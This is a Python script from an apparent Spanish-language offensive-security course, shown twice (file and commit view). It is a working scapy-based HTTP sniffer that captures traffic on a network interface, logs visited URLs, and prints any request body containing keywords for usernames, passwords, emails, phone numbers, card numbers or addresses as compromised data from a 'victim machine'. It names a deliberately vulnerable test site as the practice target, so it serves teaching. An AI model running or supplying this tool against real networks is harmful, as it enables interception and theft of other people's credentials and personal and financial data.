Curso-lenguaje-python/python-ofensivo/15_hacking/03_http_sniffer_scapy.py

# /usr/bin/env python3
"""
HTTP sniffer

Práctica con testphp.vulnweb.com

"""

import argparse
import signal
import scapy.all as scapy
from scapy.layers import http


def def_handler(sig, frame):

    print("\n\n[!] Saliendo del programa...\n")
    exit(1)


signal.signal(signal.SIGINT, def_handler)


def get_arguments():
    """
    Obtiene los argumentos de la línea de comandos
    """

    parser = argparse.ArgumentParser(description="DNS sniffer")
    parser.add_argument(
        "-i", "--interface",
        required=True, dest="interface",
        help="Interfaz de red a utilizar"
    )
    args = parser.parse_args()

    return args


def process_sniffed_packet(packet):
    """
    Procesa el paquete sniffado
    """

    cred_keywords = [
        "username", "user", "uname", "urname", "user_name", "usern"
        "login", "password", "pass", 
        "mail", "email", "correo",
        "phone", "telephone", "tel", "cellphone", "cell", "cel", "movil",
        "credit", "card", "cc", "tarjeta", "credito", "debito", "debit", "ucc"
        "address", "direccion", "dir", "street", "calle", "avenue", "av",
        "location", "city", "country"]

    if packet.haslayer(http.HTTPRequest):

        url = "http://" + \
            packet[http.HTTPRequest].Host.decode() + \
            packet[http.HTTPRequest].Path.decode()
        
        print(f"[+] URL visitada: {url}")

        if packet.haslayer(scapy.Raw):

            try:

                response = packet[scapy.Raw].load.decode()

                for keyword in cred_keywords:

                    if keyword in response:

                        print(f"[+] Información comprometida: {response}")
                        break

            except:

                pass


def sniff(interface):
    """
    Sniffing de paquetes
    """

    print("\n[+] Interceptando paquetes de la máquina victima: \n")

    scapy.sniff(
        iface=interface, store=False,
        prn=process_sniffed_packet
    )


def main():
    """
    Función principal
    """

    arguments = get_arguments()

    sniff(arguments.interface)


if __name__ == "__main__":

    main()
Add sniffer scapy 2024-01-29 19:28:10 +01:00			`# /usr/bin/env python3`
			`"""`
			`HTTP sniffer`

			`Práctica con testphp.vulnweb.com`

			`"""`

			`import argparse`
			`import signal`
			`import scapy.all as scapy`
			`from scapy.layers import http`


			`def def_handler(sig, frame):`

			`print("\n\n[!] Saliendo del programa...\n")`
			`exit(1)`


			`signal.signal(signal.SIGINT, def_handler)`


			`def get_arguments():`
			`"""`
			`Obtiene los argumentos de la línea de comandos`
			`"""`

			`parser = argparse.ArgumentParser(description="DNS sniffer")`
			`parser.add_argument(`
			`"-i", "--interface",`
			`required=True, dest="interface",`
			`help="Interfaz de red a utilizar"`
			`)`
			`args = parser.parse_args()`

			`return args`


			`def process_sniffed_packet(packet):`
			`"""`
			`Procesa el paquete sniffado`
			`"""`

			`cred_keywords = [`
			`"username", "user", "uname", "urname", "user_name", "usern"`
			`"login", "password", "pass",`
			`"mail", "email", "correo",`
			`"phone", "telephone", "tel", "cellphone", "cell", "cel", "movil",`
			`"credit", "card", "cc", "tarjeta", "credito", "debito", "debit", "ucc"`
			`"address", "direccion", "dir", "street", "calle", "avenue", "av",`
			`"location", "city", "country"]`

			`if packet.haslayer(http.HTTPRequest):`

			`url = "http://" + \`
			`packet[http.HTTPRequest].Host.decode() + \`
			`packet[http.HTTPRequest].Path.decode()`

			`print(f"[+] URL visitada: {url}")`

			`if packet.haslayer(scapy.Raw):`

			`try:`

			`response = packet[scapy.Raw].load.decode()`

			`for keyword in cred_keywords:`

			`if keyword in response:`

			`print(f"[+] Información comprometida: {response}")`
			`break`

			`except:`

			`pass`


			`def sniff(interface):`
			`"""`
			`Sniffing de paquetes`
			`"""`

			`print("\n[+] Interceptando paquetes de la máquina victima: \n")`

			`scapy.sniff(`
			`iface=interface, store=False,`
			`prn=process_sniffed_packet`
			`)`


			`def main():`
			`"""`
			`Función principal`
			`"""`

			`arguments = get_arguments()`

			`sniff(arguments.interface)`


			`if __name__ == "__main__":`

			`main()`